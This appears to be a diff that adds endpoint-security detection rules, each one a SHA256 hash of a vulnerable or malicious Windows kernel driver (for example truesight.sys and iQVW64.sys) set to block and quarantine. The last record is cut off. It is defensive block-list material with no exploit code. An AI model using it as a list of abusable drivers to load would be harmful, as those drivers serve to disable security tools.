+{
+ "id": "ef8baf7d-9f53-5e5d-a45f-e2206661bc77",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.829386Z",
+ "creation_date": "2026-03-23T11:45:31.829389Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.829398Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "ec978cd1362e1f6d9c0afab0a13d9cb10cf9ef35d674451c4c67ad934877a147",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "ef93f228-7cb5-5c11-a2d3-c55ae5a65410",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.619575Z",
+ "creation_date": "2026-03-23T11:45:29.619577Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.619582Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "34f6f68262fb25da9f6c974d6c2be8deb02b251506c847a4d6fc15f0cf5613a0",
+ "comment": "Insyde Software dangerous update tool (aka segwindrvx64.sys) [https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?name=Program%3AWin32%2FVulnInsydeDriver.A&threatid=258247] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "efa69846-5793-5974-a73e-7e1ad7b0ad39",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.471745Z",
+ "creation_date": "2026-03-23T11:45:31.471748Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.471758Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "b35ac0a4ee6955a86abdbcc13576b77f4207c67a203e9e3b288cb15a0c7f9e49",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "efa89129-e939-53c8-babe-3780cfc5a234",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.826765Z",
+ "creation_date": "2026-03-23T11:45:31.826767Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.826772Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "51ad1bbbf59f79eeb923399825ec464589be427c5611d64bb5d47df7a3273240",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "efb244d0-676f-5216-bfe1-945af34706c8",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.972248Z",
+ "creation_date": "2026-03-23T11:45:29.972250Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.972256Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "50bc80ebd0b61bc46a4cacb915602acdecaf47c5c767a020bf103c511327169d",
+ "comment": "Intel Ethernet diagnostics vulnerable driver (aka iQVW64.sys) [CVE-2015-2291] [https://www.loldrivers.io/drivers/1d2cdef1-de44-4849-80e5-e2fa288df681/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "efb24eae-ecab-599a-bd79-efbd5742e6ba",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.159598Z",
+ "creation_date": "2026-03-23T11:45:31.159600Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.159606Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "74b5fca7c4240da63fde43eaebb9253fc09743f350b9ff3e4ca2eec24f264ac7",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "efb36918-ccb4-57e2-8e7c-321ff1262f45",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.823554Z",
+ "creation_date": "2026-03-23T11:45:30.823556Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.823562Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "a237ca9187b7a3b712c3d82e5a448e424502723bbb5ddc2b7031bc3fda427d39",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "efc0d5f3-03e6-56f9-9e0b-e144cf188019",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.811916Z",
+ "creation_date": "2026-03-23T11:45:31.811918Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.811923Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "0a915b38bdb60aee912061533f0ca8eb81919daa89b39857a35ec596975f6b4b",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "efc2d080-97db-5f64-a0a2-bd163c629609",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.830204Z",
+ "creation_date": "2026-03-23T11:45:31.830206Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.830211Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "9b004a79cad9699b5442c85257e1a3f4730d5bb55858958c2de0da9f20c75585",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "efd232bd-abaf-5154-aca8-6d97381b1062",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:32.146960Z",
+ "creation_date": "2026-03-23T11:45:32.146963Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:32.146972Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "17a997feed57712f46558b4c99766d5b7722e1b095133b6b391a4743140e45de",
+ "comment": "Vulnerable Kernel Driver (aka CSAgent.sys) [https://www.loldrivers.io/drivers/ca6455d1-b06e-496c-be33-f89c41b27540/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "efd4399e-86a5-5b68-905c-8f2a62601ef2",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.491760Z",
+ "creation_date": "2026-03-23T11:45:31.491762Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.491768Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "8671130cfa9caf8f7906a045ffe78863d90b39632b040c27b64c8e2e4ef6907e",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "efe50127-f8fe-5435-a84a-ffbe52c3e57b",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.488081Z",
+ "creation_date": "2026-03-23T11:45:31.488083Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.488088Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "4e6fa3809d27690bbafec8169babaebf7cad6bbc92a2da46bea44b6449a6555c",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "efe550dc-8c22-5146-ab27-d9cc169ee7ad",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.982922Z",
+ "creation_date": "2026-03-23T11:45:29.982924Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.982929Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "87aae726bf7104aac8c8f566ea98f2b51a2bfb6097b6fc8aa1f70adeb4681e1b",
+ "comment": "Vulnerable Kernel Driver (aka WiseUnlo.sys) [https://www.loldrivers.io/drivers/b28cc2ee-d4a2-4fe4-9acb-a7a61cad20c6/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "efffb64d-ef10-52c7-8bfa-266432c4c6e1",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.151955Z",
+ "creation_date": "2026-03-23T11:45:31.151959Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.151968Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "7b70df6587cbc7ac03775ccc56a4e9968f043593e5b7f527ea16bafd83da91a5",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "f009da7d-f665-555f-aab6-c828df633274",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.147518Z",
+ "creation_date": "2026-03-23T11:45:31.147520Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.147525Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "65e3626d970e6930fb0b845ca1b248d077b0b28344589b373a6bc4dd17a9d589",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "f00ac7d0-b918-5151-b759-f7ef945aa72a",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.605612Z",
+ "creation_date": "2026-03-23T11:45:29.605614Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.605619Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "d944cd16626a5e72a3183a6e30e1b44807d4d48d41eb8904beda41de899634e2",
+ "comment": "Process Explorer driver (aka PROCEXP.SYS and PROCEXP152.SYS) [https://learn.microsoft.com/en-us/sysinternals/downloads/process-explorer] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "f016559d-ebea-57c9-aa04-28be1a2ca494",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:32.144967Z",
+ "creation_date": "2026-03-23T11:45:32.144969Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:32.144974Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "d1ea9e16cefbec53a65a290bb42ee9d6e31218b9d4dfca676b66373cece9a54a",
+ "comment": "Malicious Kernel Driver (aka driver_d1ea9e16.sys) [https://www.loldrivers.io/drivers/8697785a-d088-42a7-ac25-b5c8a3b22664/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "f019f337-4c4c-5e3f-b21e-2d853cc47595",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.610353Z",
+ "creation_date": "2026-03-23T11:45:29.610355Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.610360Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "2ef7df384e93951893b65500dac6ee09da6b8fe9128326caad41b8be4da49a1e",
+ "comment": "CPUID CPU-Z vulnerable driver (aka cpuz143_x64.sys) [CVE-2017-15302] [https://www.loldrivers.io/drivers/de003542-80e1-4aa0-9b99-ed8647a93a6e/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "f034cab5-d72a-524a-b8c5-d7cfc6f1cef6",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:32.146836Z",
+ "creation_date": "2026-03-23T11:45:32.146838Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:32.146844Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "fb0dbc3b9c897b7571b94fb2203ffb1ac0facfe366b2cb1f91904ea5335018f0",
+ "comment": "Vulnerable Kernel Driver (aka BioNTdrv.sys) [https://www.loldrivers.io/drivers/e6378671-986d-42a1-8e7a-717117c83751/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "f037a0a8-4c01-5be7-b117-b8209798deff",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:32.145131Z",
+ "creation_date": "2026-03-23T11:45:32.145133Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:32.145139Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "e38eb95fd1593c73311d426dbd85491494a4521aaa4c4ef66e02f7d6d0339171",
+ "comment": "Malicious Kernel Driver (aka driver_4f9b5a2f.sys) [https://www.loldrivers.io/drivers/b660d253-2b60-46c5-b95a-c354aa5eb154/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "f03906e9-ffdf-5077-bd2a-d72b34806ee0",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.152548Z",
+ "creation_date": "2026-03-23T11:45:31.152552Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.152557Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "56555f87cd6b154ea3ddc4195900fbea74f45cd8376b335864733fd4a51c69e7",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "f0477214-7582-5bda-a0c9-8307b7b9469b",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.812379Z",
+ "creation_date": "2026-03-23T11:45:31.812383Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.812391Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "c02cc59bb4fbe9aa64762b1c91edf512cdfc12a9363d396864354d95d3b8492c",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "f04a159e-819d-5461-93fd-e0db9e3d8621",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
